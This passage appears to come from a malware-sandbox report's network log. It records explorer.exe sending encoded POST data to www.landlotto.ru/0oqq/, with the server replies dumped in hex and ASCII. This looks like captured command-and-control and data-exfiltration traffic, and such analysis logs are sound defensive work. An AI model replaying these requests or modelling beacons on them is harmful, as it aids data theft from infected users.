                                                                                                                      x-via: FRA1
                                                                                                                      connection: close
                                                                                                                      Data Raw: 43 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: C4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      13192.168.2.349712109.70.26.3780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:38.088892937 CET186OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.landlotto.ru
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.landlotto.ru
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.landlotto.ru/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 7e 58 46 38 47 68 66 69 51 35 56 61 35 75 6d 76 47 57 46 54 6f 4f 7e 73 50 74 44 49 65 4e 75 36 4b 71 58 44 6d 55 58 39 74 53 6d 6c 4c 6a 32 4e 58 42 4b 65 48 72 78 59 45 42 54 42 48 53 66 64 70 63 64 66 46 71 6c 36 53 53 34 4a 39 61 61 6c 31 34 48 2d 36 32 77 39 64 64 79 2d 33 37 44 48 64 79 6d 38 35 39 65 57 70 72 53 52 32 77 70 34 7a 55 74 63 73 32 53 77 57 32 45 75 47 4a 30 55 35 52 56 62 61 38 55 42 4e 37 6e 61 54 6c 30 52 76 44 5a 57 61 52 4c 39 42 32 45 42 49 39 43 31 43 48 76 6a 4a 39 47 70 52 65 74 41 65 76 65 4a 48 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=~XF8GhfiQ5Va5umvGWFToO~sPtDIeNu6KqXDmUX9tSmlLj2NXBKeHrxYEBTBHSfdpcdfFql6SS4J9aal14H-62w9ddy-37DHdym859eWprSR2wp4zUtcs2SwW2EuGJ0U5RVba8UBN7naTl0RvDZWaRL9B2EBI9C1CHvjJ9GpRetAeveJHA).
                                                                                                                      Mar 20, 2023 09:09:38.141721964 CET187INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Mon, 20 Mar 2023 08:09:35 GMT
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 31 66 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 4c 41 4e 44 4c 4f 54 54 4f 2e 52 55 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 55 2d 43 45 4e 54 45 52 20 2d 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 bd d1 8b d1 85 20 d0 b8 d0 bc d0 b5 d0 bd 20 2e d0 a0 d0 a4 2c 20 2e 52 55 2c 20 2e 53 55 2c 20 2e 43 4f 4d 2e 2e 2e 20 d0 a5 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d1 81 d0 b0 d0 b9 d1 82 d0 be d0 b2 20 d0 b8 20 44 4e 53 2d d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 be d0 b2 2e 20 d0 9f d1 80 d0 be d0 b4 d0 b0 d0 b6 d0 b0 20 d0 b8 20 d0 bf d0 be d0 ba d1 83 d0 bf d0 ba d0 b0 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 d0 bd d0 b0 20 d0 b0 d1 83 d0 ba d1 86 d0 b8 d0 be d0 bd d0 b5 2e 20 d0 9e d1 81 d0 b2 d0 be d0 b1 d0 be d0 b6 d0 b4 d0 b0 d1 8e d1 89 d0 b8 d0 b5 d1 81 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d1 8b 2e 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 b4 d0 be d0 bc d0 b5 d0 bd 2c 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 be d0 b2 2c 20 d0 a0 d0 a4 2c 20 52 55 2c 20 43 4f 4d 2c 20 d0 b0 d1 83 d0 ba d1 86 d0 b8 d0 be d0 bd 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 be d0 b2 2c 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 2c 20 d0 bf d0 be d1 87 d1 82 d0 b0 2c 20 d0 be d1 81 d0 b2 d0 be d0 b1 d0 be d0 b6 d0 b4 d0 b0 d1 8e d1 89 d0 b8 d0 b5 d1 81 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d1 8b 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 69 63 2e 72 75 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 6e 69 63 2e 72 75 2f 69 6d 61 67 65 73 2f 77 38 2f 77 69 6e 38 74 72 61 6e 73 70 2e 70 6e 67 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 43 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 33 33 39 39 46 46 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 6d 61 67 65 5f 73 72 63 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 61 67 65 2e 6e 69 63 2e 72 75 2f 72 75 2f 69 6d 61 67 65 73 2f 70 6e 67 2f 31 2e 72 63 2d 6c 6f 67 6f 2d 6f 67 2e 70 6e 67 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 55 2d 43 45 4e 54 45 52 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 6e 69 63 2e 72
                                                                                                                      Data Ascii: 1f7e<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>LANDLOTTO.RU</title> <meta name="description" content="RU-CENTER - ., .RU, .SU, .COM... DNS-. . ."> <meta name="keywords" content=", , , RU, COM, , , , "> <meta name="application-name" content="nic.ru"> <meta name="msapplication-TileImage" content="http://nic.ru/images/w8/win8transp.png"> <meta name="msapplication-TileColor" content="#3399FF"> <link rel="image_src" href="http://storage.nic.ru/ru/images/png/1.rc-logo-og.png"> <meta property="og:title" content="RU-CENTER"> <meta property="og:type" content="website"> <meta property="og:url" content="http://nic.r
                                                                                                                      Mar 20, 2023 09:09:38.141796112 CET189INData Raw: 75 2f 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 55 2d 43 45 4e 54 45 52 20 2d 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f
                                                                                                                      Data Ascii: u/"> <meta property="og:description" content="RU-CENTER - RU, , COM, , , , DNS
                                                                                                                      Mar 20, 2023 09:09:38.141819954 CET190INData Raw: 73 6f 75 72 63 65 3d 73 74 70 67 5f 61 6c 6c 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 6c 6b 5f 65 6e 74 65 72 22 20 6f 6e 63 6c 69 63 6b 3d 22 67 61 28 27 73 65 6e 64 27 2c 20 27 65 76 65 6e 74 27
                                                                                                                      Data Ascii: source=stpg_all&utm_medium=link&utm_campaign=lk_enter" onclick="ga('send', 'event', 'stpg_all', 'lk_enter', 'click')"> </a> </div> </div> <div class="b-content"> <div class="b-t
                                                                                                                      Mar 20, 2023 09:09:38.141844034 CET190INData Raw: 57 6f 72 64 50 72 65 73 73 2c 20 d0 91 d0 b8 d1 82 d1 80 d0 b8 d0 ba d1 81 20 d0 b8 20 4a 6f 6f 6d 6c 61 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 63 2e 72 75 2f 63 61 74 61
                                                                                                                      Data Ascii: WordPress, Joomla</p> <a href="https://www.nic.ru/catalog/hosting/cms/?ipartner=6666&adv_id=click_cmsh&utm_source=stpg_all&utm_medium=link&utm_campaign=click_cmsh" onclick="ga('send', 'event', 'stpg_all', 'promo_2',
                                                                                                                      Mar 20, 2023 09:09:38.195672989 CET192INData Raw: d1 81 d1 81 d0 b8 d0 be d0 bd d0 b0 d0 bb d1 8c d0 bd d1 8b d0 b9 20 d1 81 d0 b0 d0 b9 d1 82 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 d1 81 d0 b2 d0 be d0 b8 d0 bc d0 b8 20 d1 80 d1 83 d0 ba d0 b0 d0 bc d0 b8 3c 2f 70 3e 0a 20 20 20 20
                                                                                                                      Data Ascii: <br /> </p> <a href="https://www.nic.ru/catalog/sites/sitebuilder/?ipartner=6666&adv_id=click_sitebuild&utm_source=stpg_all&utm_medium=link&utm_campaign=click_sitebuil
                                                                                                                      Mar 20, 2023 09:09:38.195720911 CET193INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 63 2e 72 75 2f 70 72 6f 64 75 63 74 2f 66 6f 72 2d 64 6f 6d 61 69 6e 2d 75 73 65 2f 77 65 62 2d 66 6f 72 77 61 72 64 69 6e 67 2f 3f 69 70 61 72 74 6e 65 72 3d 36 36 36 36 26 61 64
                                                                                                                      Data Ascii: a href="https://www.nic.ru/product/for-domain-use/web-forwarding/?ipartner=6666&adv_id=click_domain_forward&utm_source=stpg_all&utm_medium=link&utm_campaign=click_domain_forward" onclick="ga('send', 'event', 'stpg_all', 'promo_5', 'click_domai
                                                                                                                      Mar 20, 2023 09:09:38.195748091 CET194INData Raw: bc d0 b0 d1 86 d0 b8 d1 8f 20 d0 be 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b5 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 63 2e 72 75 2f 68 65 6c 70 2f 73 74 61 74 75 73 6e 61 79 61 2d 73 74
                                                                                                                      Data Ascii: </a> <a href="https://www.nic.ru/help/statusnaya-stranica_4785.html?ipartner=6666&adv_id=faq&utm_source=stpg_all&utm_medium=link&utm_campaign=faq" onclick="ga('send', 'event', 'stpg_all', 'faq', 'click')">
                                                                                                                      Mar 20, 2023 09:09:38.195777893 CET196INData Raw: 73 74 69 6e 67 2f 64 65 64 69 63 61 74 65 64 2f 22 3e d0 90 d1 80 d0 b5 d0 bd d0 b4 d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b0 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 69 63 2e 72
                                                                                                                      Data Ascii: sting/dedicated/"> </a> <a href="https://www.nic.ru/catalog/sites/sitebuilder/"> </a> <a href="https://www.nic.ru/auction/"> </a> </d
                                                                                                                      Mar 20, 2023 09:09:38.195799112 CET196INData Raw: 6c 65 2e 6f 70 61 63 69 74 79 20 3d 20 31 2b 4d 61 74 68 2e 6c 6f 67 28 73 63 72 6f 6c 6c 50 65 72 63 65 6e 74 29 3b 0a 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 29 3b 0a 20 20 7d 29 3b 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79
                                                                                                                      Data Ascii: le.opacity = 1+Math.log(scrollPercent); }); }); });</script></body></html>0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      14192.168.2.349713109.70.26.3780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:40.664755106 CET202OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.landlotto.ru
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 5337
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.landlotto.ru
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.landlotto.ru/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 7e 58 46 38 47 68 66 69 51 35 56 61 72 65 36 76 4b 58 46 54 28 65 7e 7a 44 4e 44 49 55 74 75 32 4b 71 62 44 6d 57 37 74 74 68 4b 6c 4c 31 6d 4e 51 69 79 65 46 72 78 59 43 42 54 46 4a 79 66 31 70 63 4a 54 46 6f 38 50 53 51 30 4a 38 49 79 6c 79 59 48 39 6d 6d 77 38 63 64 79 39 7a 37 44 48 64 79 71 67 35 5f 6e 6a 70 71 36 52 32 43 78 34 7a 51 4d 4b 71 6d 53 78 4a 47 45 75 47 4a 78 61 35 52 56 71 61 38 4e 63 4e 37 48 61 54 30 45 52 6f 52 68 56 4e 52 4c 2d 49 57 46 52 50 34 72 36 45 57 54 50 50 64 4b 5a 53 61 77 43 52 2d 6e 65 55 67 67 68 71 73 6e 36 6f 62 6f 4e 36 55 65 4c 63 70 28 58 51 67 58 72 62 6c 50 6a 73 62 57 5a 66 66 4b 41 6d 74 68 41 4f 39 58 6f 50 30 5a 36 55 5f 33 76 64 74 62 5f 32 42 57 4b 6b 46 61 35 36 72 36 68 6f 45 59 6c 33 38 70 68 4a 41 55 6b 56 38 76 79 69 6c 4e 52 73 34 71 34 78 33 28 6b 76 62 70 33 53 33 59 36 52 74 33 4b 57 78 78 38 50 65 32 76 7e 6a 4f 77 68 74 52 51 62 32 63 43 44 35 75 4c 50 68 43 4a 47 57 70 6d 74 4f 79 74 67 5f 68 6c 7a 77 31 4e 6f 57 30 54 28 6e 4b 35 4d 44 47 49 62 34 66 68 59 74 6c 63 4e 55 79 55 6e 6a 44 35 6c 51 34 57 63 79 67 54 5a 74 62 32 4b 59 6e 49 28 30 77 30 45 59 6a 73 41 4f 6e 34 33 77 69 30 73 6e 5a 32 33 46 72 4d 31 43 33 4c 4c 34 28 4e 79 34 64 69 55 62 59 37 46 69 48 36 56 38 55 55 50 74 33 75 6b 6e 59 65 53 6e 39 71 77 52 5a 51 55 63 4a 79 35 69 79 79 54 74 4c 59 75 6e 35 68 65 49 38 5f 74 31 66 68 39 46 79 76 4a 70 6e 76 68 45 36 4d 50 32 6e 58 6a 45 78 66 75 4e 69 6e 4c 41 68 66 6a 6a 46 6a 65 4d 6e 30 4e 62 6d 58 34 59 41 50 37 79 37 6d 59 53 55 39 49 4d 74 59 78 46 7e 61 36 62 51 79 68 6c 6b 6f 4e 6d 5a 36 31 4a 30 31 39 6b 38 35 6f 61 49 57 6d 59 7a 46 6e 4b 72 36 37 4c 68 79 46 31 5a 44 63 71 45 5a 55 5a 4a 45 35 57 54 4e 46 45 50 32 4a 31 44 45 59 4c 56 4f 6d 30 5a 76 55 42 75 31 42 2d 65 4b 7a 31 38 76 70 51 6c 39 51 74 52 46 79 71 53 56 63 72 59 42 53 6b 47 63 49 73 44 36 38 33 75 73 57 71 45 6d 38 72 50 74 6b 48 64 6f 37 4d 6a 71 63 30 44 54 57 67 32 6e 49 62 71 67 6d 4a 75 36 41 6c 33 45 7e 4a 44 31 48 71 75 5a 78 52 72 61 7e 4f 6c 30 79 6b 7a 77 61 32 4c 6e 44 51 74 79 4e 43 42 46 6d 53 47 78 4e 76 6f 6b 31 56 78 42 31 33 33 32 4b 7a 54 6a 76 2d 30 6e 77 4d 79 31 56 30 61 68 30 64 58 51 72 53 61 50 6d 4a 64 71 73 55 77 59 4a 6f 4b 38 6a 72 37 70 79 4b 52 41 46 38 53 64 53 56 38 75 4f 71 45 53 4c 39 62 78 62 30 41 4e 70 52 35 39 36 54 37 63 6d 69 61 5f 42 51 49 76 47 68 38 39 37 35 49 67 52 6e 38 39 66 77 6b 5f 4d 4b 35 48 74 32 59 57 6f 61 4c 75 68 78 74 52 42 59 67 69 73 79 46 31 45 34 28 61 43 65 33 78 36 61 58 6d 30 4e 54 50 63 4f 43 7a 7e 6e 6c 47 49 50 6e 4c 33 32 59 59 28 34 58 66 62 5f 4e 32 72 35 46 35 50 4c 42 33 74 30 5a 67 62 68 62 31 67 6b 68 34 79 4b 47 55 73 72 42 76 4c 77 51 42 77 74 71 6b 61 64 63 6d 6c 67 41 33 53 31 64 4a 31 41 31 56 46 49 32 77 56 6a 45 31 64 61 67 70 75 57 37 6d 6d 30 35 6f 52 6a 74 48 4e 35 7e 73 7a 57 42 73 56 31 4c 78 37 4e 55 39 52 70 65 55 51 63 43 39 47 59 30 77 57 68 5a 53 66 71 55 4b 30 4b 78 6b 67 56 30 57 32 4a 39 53 47 43 69 56 45 78 63 56 71 67 67 45 35 69 70 45 68 30 35 52 56 6a 4c 68 6a 47 6c 6f 74 5f 6e 38 46 63 76 70 59 68 72 2d 6f 4d 65 45 41 5f 6d 4b 39 4f 69 49 6e 72 51 57 69 38 76 6e 50 39 50 69 47 55 6f 4b 45 53 75 53 37 55 50 35 59 64 36 48 30 46 72 44 4a 39 39 31 48 66 62 39 73 4a 45 54 6e 65 54 65 39 54 43 37 50 58 6e 38 53 39 69 6f 66 5f 37 58 31 71 65 65 67 7a 4e 39 63 65 54 45 36 63 47 56 44 39 4f 7a 54 32 4f 44 4e 30 41 75 34 34 64 79 38 63 6e 45 49 37 4c 56 78 38 6b 53 77 7a 28 30 6a 67 49 73 4d 4f 39 37 6d 4c 37 45 77 55 53 70 73 41 67 36 67 51 61 71 6e 48 74 32 67 6e 65 65 7e 67 30 5a 71 78 6b 30 73 50 48 71 70 54 77 36 74 53 34 39 75 33 51 42 58 30 59 75 28 75 36 76 75 76 67 44 4b 35 44 54 71 43 33 72 64 36 4b 66 47 63 79 31 4c 75 57 47 30 47 4d 55 47 74 66 63 41 34 74 6a 57 56 77 76 64 74 56 5f 33 45 62 65 31 4d 67 5f 6c 7a 42 77 63 6c 53 32 58 6c 34 53 58 7a 44 47 53 4d 44 7a 6f 4c 79 35 35 46 4b 76 58 6e 74 4b 49 53 38 65 70 76 67 64 76 72 6c 73 45 4a 39 52 61 77 31 7a 6b 61 37 48 50 4f 50 59 28 69 28 5f 33 31 32 72 45 52 35 4f 4e 32 56 51 51 65 36
                                                                                                                      Data Ascii: ICHyvj5=~XF8GhfiQ5Vare6vKXFT(e~zDNDIUtu2KqbDmW7tthKlL1mNQiyeFrxYCBTFJyf1pcJTFo8PSQ0J8IylyYH9mmw8cdy9z7DHdyqg5_njpq6R2Cx4zQMKqmSxJGEuGJxa5RVqa8NcN7HaT0ERoRhVNRL-IWFRP4r6EWTPPdKZSawCR-neUgghqsn6oboN6UeLcp(XQgXrblPjsbWZffKAmthAO9XoP0Z6U_3vdtb_2BWKkFa56r6hoEYl38phJAUkV8vyilNRs4q4x3(kvbp3S3Y6Rt3KWxx8Pe2v~jOwhtRQb2cCD5uLPhCJGWpmtOytg_hlzw1NoW0T(nK5MDGIb4fhYtlcNUyUnjD5lQ4WcygTZtb2KYnI(0w0EYjsAOn43wi0snZ23FrM1C3LL4(Ny4diUbY7FiH6V8UUPt3uknYeSn9qwRZQUcJy5iyyTtLYun5heI8_t1fh9FyvJpnvhE6MP2nXjExfuNinLAhfjjFjeMn0NbmX4YAP7y7mYSU9IMtYxF~a6bQyhlkoNmZ61J019k85oaIWmYzFnKr67LhyF1ZDcqEZUZJE5WTNFEP2J1DEYLVOm0ZvUBu1B-eKz18vpQl9QtRFyqSVcrYBSkGcIsD683usWqEm8rPtkHdo7Mjqc0DTWg2nIbqgmJu6Al3E~JD1HquZxRra~Ol0ykzwa2LnDQtyNCBFmSGxNvok1VxB1332KzTjv-0nwMy1V0ah0dXQrSaPmJdqsUwYJoK8jr7pyKRAF8SdSV8uOqESL9bxb0ANpR596T7cmia_BQIvGh8975IgRn89fwk_MK5Ht2YWoaLuhxtRBYgisyF1E4(aCe3x6aXm0NTPcOCz~nlGIPnL32YY(4Xfb_N2r5F5PLB3t0Zgbhb1gkh4yKGUsrBvLwQBwtqkadcmlgA3S1dJ1A1VFI2wVjE1dagpuW7mm05oRjtHN5~szWBsV1Lx7NU9RpeUQcC9GY0wWhZSfqUK0KxkgV0W2J9SGCiVExcVqggE5ipEh05RVjLhjGlot_n8FcvpYhr-oMeEA_mK9OiInrQWi8vnP9PiGUoKESuS7UP5Yd6H0FrDJ991Hfb9sJETneTe9TC7PXn8S9iof_7X1qeegzN9ceTE6cGVD9OzT2ODN0Au44dy8cnEI7LVx8kSwz(0jgIsMO97mL7EwUSpsAg6gQaqnHt2gnee~g0Zqxk0sPHqpTw6tS49u3QBX0Yu(u6vuvgDK5DTqC3rd6KfGcy1LuWG0GMUGtfcA4tjWVwvdtV_3Ebe1Mg_lzBwclS2Xl4SXzDGSMDzoLy55FKvXntKIS8epvgdvrlsEJ9Raw1zka7HPOPY(i(_312rER5ON2VQQe6l1KY1clBtaRzAFe(2smVYx_MHck4BNxELFya3VPupRE0MIHnu2-Upn2JaJnbLO8Lp8gJpUdXPeZccvRAOfuAy3qTA5YWUN1QK8Q2_mXwXATRQ3OXoIQsslxXCt-cgLf9TujwvSKz3unA784gEXboiWvpRvR9jUkUH8Q2vsbb0erF5wR8g9AUBk2EAD57KIDieNxs8AYa0EnFyFDkm3_OgqIIJc1DF5DV79s0hTS1a(SDh8aAHi_uYk1hyc_vukw(eMEPGO5XqAutkBwbHomfHoRptGIIGMax8m7~QKbey7cI1K5x-RiwWgj5c(XWyeDbEbEylO_BA(fEDfcgveRY_3xtf6lvZ3QD_ghLrHBJFn1j3XH4xgLJv7_FgYTfdxEgvlb2YEswmo-DZZNR6~0FvEpy3CisCn_Vbor54VbSgDdMfw_r-U-4IgBq4elvZSgzsRNo1(oDXmwRosYG6C4(Nn22k(oRzfPuVT8(VnFRxhwMF8u4yQGMxVWg2wxIyF3nMo80W3DR48bLKkkIi0iTIj_cXB2IQe3vjsHjaBBZ7uqiTo7ispYJSERCn0AnNIFNX49OAhkn0RcoVWYs_C51hIxlQ0WJk936fRgU3ERF72wytRBwgM8HKhrNYQ-lipK7tvTA_vjo_GxRkbkUxmfpT9gCdK4r_PiNuROCMblKM16I0IWcZE40Y02pGgFI9gBA52g8L0ammXB6OFXB7EWZsTZY4FK2oSPCtYI377FFGjRFbHRqxxl7vkdAP6NMR3-cPfgujkbYHrRGBRJSVg_W_kRBHVfrbI4xhLg5Dfcr_u6rUqfYliCnEqJgU3FeBIb1oLkYN~Q5zqH7szBLmNnn9QLEg7AygIQnrTPOOfWTGpGjx(87_R7YqrOFPn5A7Ry1nEcVcd_K7ap09yYdEijS3u3M3fDm6nQQhn2WT6m3gKz8shycbciDfRE2t8PtKM-64JSLoPDo6xzl-PKNCl-DZ5aBfCuJisalq6PSOCZjMQq3eX54d(2lEie3VZg7-tVexONHEjWVTpLOB(RtarL3KFhSgdlujaO9Qn8OmHwJb587ssycEE4nJTV00UAtjCrHPCR7Og_XeC5~qhZ3J2h5aeslj5juBwPCRuZJMVXWODaN-17ulAcilouM3q75edImQsJa0ULNCv16oZ5WsP6Ebko9qyhMzmrzf4RH1kb0BX-L4oMnZ6mAtZflSq6AFT9eei5i756UGYzcTe3vEg2d0gMRleOrW183X7tye4q242BmpiIINWnN3zD9CvmIHzJsz4OmTdN84nAXhABL_zxb70cniVe3JO-HW5jmUtbFhiSmEZ3lSDmWOyO2UgRymiWjwZVuudcicW6UZZbVlepIRB2~mAy1kNvOVxdtQG2BKspeeo4ZkF8V0lkQ4kVnEqm6wm0OUoTSszEAA0mJPxJbfgH8ZQzDck4Kh3FN1BlSuZ66GcZJBd8CcU3o_T24wJxqhI3TYvgkKtwfswPYOUfvtzYkkYDrtQ-1yNTmE9kmvoreQ4_~9QSdxLfV7KESusRwBpq4g(VJOSl2_ImquBT87mEV0FRoXZ9KuhYNBfKzwoTkHpxhFkT51GIIyq4zv0tLHWRtGWNVUKCerJ60dRqQLFVYfbon9~-yTw9Wkk42Swt8cvX3DARku8xddRO86V_lqmGUyEMPfdYyxBsstaBya7RLHDcaJcaD_J-yef9uXk8ezrkBjYTmARUzdNrCvo3T3I4aRHkJNTcDHDmH_WVnqdrHix4HztbxyXlokd0yBtCYle7WzsTBJPakx4XrGZk0JiyuLKY8z2kTBf4qeHrqeyMXNkzEpFKgxXUeruhXYNH9He1ltlx(z2jnDL0igzdH7faumkCgINOP1w5GfTSDe33x_E8MNq-H4sDK7VsIlAL~AkFV_wGKF3cLb6ase~xq7KNGT9GSKKoBZc9lkdN5grv1Nd7hhlvHGwygUX3BtvOWmhLyrMpDGNiaPMVZEB1kPCH(xpyiHkkip9zU98oTrBjsTzhlVk7gixwjivAWk(1~5erYiJSJx95UPYCOaLr~6(WYL3pLX(CiiqZ2gHdmF2P1YwqA16IO_~_Wkzme2I4iyPtR0LnfijhJFi-v1bgm1dCtOl0alj7TpMgXYuRLo9nn5oqhjnOyrPjwSniUssI(FSLLHy4oUNHnctcrs133gQoZ7WkQCgmY6cJy-9SNCNV7gN6x5JcQ6dpk6K4AEqmO9PEnOqIs3qNYPWepjMGEbo_e_0XXbRXUpz7F63WrO8q7sxsv8DuXkC1KzQg5kiEjtrHztLU00O8ON8o9vY0gqzxCzXU6x1nPMmaKZ85q6bYt-~cH9FIr7(jUtqXS5YcH803yeR6ECJdvgdwldO2A5l0nF5KCEu5xWm0v5jnnG9QT5DoiuEEAI1icyx_kAiFpnw72gU4fd6AZkzNjz3GEZsa0Tq3~lWAZZyPd_~Hsa3Msoe4kxMZBgZ5MxkRGXWvLiU1DTnBjoATGWTGtTLEgCyW3lCJuAmv(kLrlgOpDwC8Oi~NFWqp2h2P62c_H-jD9J1znWvfS_bZY7N75zhenYjae3oJBGzoJg2tWIhmShmcKjbpduu70fVtpZrNSbJxIsGabP4yLkpGH3nmZADeV8KsQnBh2Z